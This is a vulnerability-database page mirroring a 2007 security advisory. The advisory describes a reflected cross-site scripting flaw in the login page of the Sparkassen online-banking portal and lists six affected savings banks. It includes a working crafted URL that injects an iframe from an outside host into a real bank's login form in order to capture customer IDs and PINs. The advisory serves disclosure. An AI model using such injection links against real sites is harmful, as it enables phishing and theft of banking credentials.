Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

sparkassen-xss.txt

🗓️ 21 May 2007 00:00:00Reported by Ulrich KeilType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 41 Views

Sparkassen-Finanzgruppe" online banking vulnerability impact on subsidiary bank

Code
`The "Sparkassen-Finanzgruppe" with a transaction volume of over 3.300   
billion euro is one of the largest banks for private customers in   
germany. Many local member-banks of the group use the online banking   
portal provided by sfze (http://www.sfze.de/), a subsidiary company of   
Sparkassen-Finanzgruppe.  
  
Vulnerability:  
The online banking software of sfze does not check the HTTP GET   
Parameter "KONTO" on the login page, and displays the content of this   
variable without modification within the html form area.  
  
Impact:  
An attacker may gather login data (ID+PIN) from customers of the   
Sparkassen-Finanzgruppe by tricking them to click on a special crafted   
link, which points to the original login page of the online banking system.  
  
Demonstration:  
The following trivial example demonstrates the impact of this   
vulnerability by extending the login form with an iframe:  
https://bankingportal.sparkasse-donnersberg.de/banking/?BLZ=54051990&Bankingaufruf.x=0&Bankingaufruf.y=0&KONTO=%22%20/%3E%3Ciframe%20src=%22http://www.derkeiler.com/uk/sp.html%22%20scrolling=%22no%22%20marginheight=%220%22%20marginwidth=%220%22%20frameborder=%220%22width=%22310px%22  
  
Some subsidiary companies of Sparkassen-Finanzgruppe which are affected   
by this vulerability:  
-Sparkasse Donnersberg  
-Sparkasse Ludwigshafen  
-Sparkasse KölnBonn  
-Sparkasse Aachen  
-Frankfurter Sparkasse  
-Sparkasse Rhein Neckar Nord  
  
Ulrich Keil  
--   
http://www.derkeiler.com  
PGP Fingerprint: 5FA4 4C01 8D92 A906 E831 CAF1 3F51 8F47 1233 9AAD  
Public key available at http://www.derkeiler.com/uk/pgp-key.asc  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 May 2007 00:00Current
7.4High risk
Vulners AI Score7.4
sparkassen-finanzgruppeonline bankingvulnerabilitysubsidiary banksgermanylogin dataiframehttp get parametersfzesparkasse donnersbergsparkasse ludwigshafensparkasse kölnbonnsparkasse aachenfrankfurter sparkassesparkasse rhein neckar nord
41